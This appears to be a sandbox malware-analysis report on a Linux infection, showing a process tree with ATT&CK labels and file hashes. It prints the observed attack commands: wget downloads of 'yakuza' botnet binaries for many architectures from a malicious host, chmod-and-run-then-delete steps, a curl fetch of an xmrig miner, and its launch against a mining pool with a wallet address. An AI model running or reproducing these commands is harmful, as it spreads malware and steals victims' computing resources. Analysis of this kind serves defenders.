                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                busybox pkill -9 XkTer0GbA1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1243
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /bin/rm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              rm -rf yakuza.mipsel
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • System Network Configuration Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:739
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/wget
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              wget http://linux-it.abuser.eu/yakuza.sh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Writes file to tmp directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:743
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /bin/chmod
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              chmod +x yakuza.sh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • File and Directory Permissions Modification
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:749
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /tmp/yakuza.sh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ./yakuza.sh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:750
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /bin/rm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                rm -rf yakuza.sh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:752
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/wget
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  wget http://linux-it.abuser.eu/yakuza.x86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Writes file to tmp directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:753
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /bin/chmod
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  chmod +x yakuza.x86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • File and Directory Permissions Modification
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:760
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /tmp/yakuza.x86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ./yakuza.x86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:761
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /bin/rm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    rm -rf yakuza.x86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:763
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/wget
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      wget http://linux-it.abuser.eu/yakuza.arm6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Writes file to tmp directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:764
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /bin/chmod
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      chmod +x yakuza.arm6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • File and Directory Permissions Modification
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:783
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /tmp/yakuza.arm6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      ./yakuza.arm6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:785
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /bin/rm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        rm -rf yakuza.arm6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:789
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/wget
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          wget http://linux-it.abuser.eu/yakuza.i686
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Writes file to tmp directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:791
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /bin/chmod
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          chmod +x yakuza.i686
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • File and Directory Permissions Modification
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:804
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /tmp/yakuza.i686
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          ./yakuza.i686
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:806
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /bin/rm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            rm -rf yakuza.i686
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:808
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/wget
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              wget http://linux-it.abuser.eu/yakuza.ppc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Writes file to tmp directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:810
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /bin/chmod
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              chmod +x yakuza.ppc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • File and Directory Permissions Modification
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:833
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /tmp/yakuza.ppc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ./yakuza.ppc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:834
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /bin/rm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                rm -rf yakuza.ppc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:838
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/wget
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  wget http://linux-it.abuser.eu/yakuza.i586
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Writes file to tmp directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:840
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /bin/chmod
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  chmod +x yakuza.i586
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • File and Directory Permissions Modification
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:846
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /tmp/yakuza.i586
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ./yakuza.i586
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:847
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /bin/rm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    rm -rf yakuza.i586
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:849
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/wget
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      wget http://linux-it.abuser.eu/yakuza.m68k
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Writes file to tmp directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:850
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /bin/chmod
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      chmod +x yakuza.m68k
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • File and Directory Permissions Modification
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:857
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /tmp/yakuza.m68k
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      ./yakuza.m68k
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:858
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /bin/rm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        rm -rf yakuza.m68k
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:860
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/wget
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          wget http://linux-it.abuser.eu/yakuza.arm4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Writes file to tmp directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:861
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /bin/chmod
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          chmod +x yakuza.arm4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • File and Directory Permissions Modification
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:867
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /tmp/yakuza.arm4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          ./yakuza.arm4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:869
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /bin/rm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            rm -rf yakuza.arm4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:871
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/wget
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              wget http://linux-it.abuser.eu/yakuza.arm5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Writes file to tmp directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:872
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /bin/chmod
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              chmod +x yakuza.arm5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • File and Directory Permissions Modification
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:881
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /tmp/yakuza.arm5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ./yakuza.arm5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:882
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /bin/rm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                rm -rf yakuza.arm5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:885
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/wget
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  wget http://linux-it.abuser.eu/yakuza.arm7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Writes file to tmp directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:886
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /bin/chmod
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  chmod +x yakuza.arm7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • File and Directory Permissions Modification
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:907
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /tmp/yakuza.arm7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ./yakuza.arm7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:908
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /bin/rm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    rm -rf yakuza.arm7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:912
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/wget
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      wget http://linux-it.abuser.eu/yakuza.sparc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Writes file to tmp directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:913
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /bin/chmod
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      chmod +x yakuza.sparc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • File and Directory Permissions Modification
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:928
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /tmp/yakuza.sparc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      ./yakuza.sparc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:929
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /bin/rm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        rm -rf yakuza.sparc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:932
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /bin/bash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          bash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:934
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /bin/ps
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ps x
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:941
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              grep xmrig
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:942
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                grep -v grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:943
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  grep 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:944
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/curl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    curl -O ftp://linux-it.abuser.eu/xmrig-lnx/xmrig
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Writes file to tmp directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:947
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /bin/chmod
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    chmod +x xmrig
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • File and Directory Permissions Modification
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:986
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/curl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  curl -s http://linux-it.abuser.eu/test.php
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:933
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/nohup
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  nohup ./xmrig --url gulf.moneroocean.stream:443 --user 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW --pass worker554 --tls "--cpu-priority=3" "--asm=auto"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:987
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /tmp/xmrig
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ./xmrig --url gulf.moneroocean.stream:443 --user 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW --pass worker554 --tls "--cpu-priority=3" "--asm=auto"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:987
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    /bin/sh ./xmrig --url gulf.moneroocean.stream:443 --user 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW --pass worker554 --tls "--cpu-priority=3" "--asm=auto"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Writes file to tmp directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:987

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Network

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Downloads

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /tmp/xmrig

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    7.9MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    8f4fff0ded94f1141768220906abfbb8

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ea7c97294f415dc8713ac8c280b3123da62f6e56

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    b0e1ae6d73d656b203514f498b59cbcf29f067edf6fbd3803a3de7d21960848d

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    0096072a1482f8e7999867baa3dd6e96d51591e9f7645c9ff276b53984957025c83e1fe52e5c4f55639eeed2bdbd80bbd57d7dacd84468ce09c834e39dfc4bee

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /tmp/yakuza.mips

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    183KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    371732a722f576ce663cf832412521a8

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    7d8f25bfc26af545c568ffc5c0afe8c4cd35de40

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    11bd15eeca11f8fcb46cce41f4387505027446b5ba8774d2b7bd759bcdb1b9d0

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    c2174eeaf058a5d78d2bb7e417373c56d5b407072de68aaae33c690fd14b93a033ef4aeb18f9a364541e51b6cfc0a28c93efbb4a1857a15b875d420e9886c014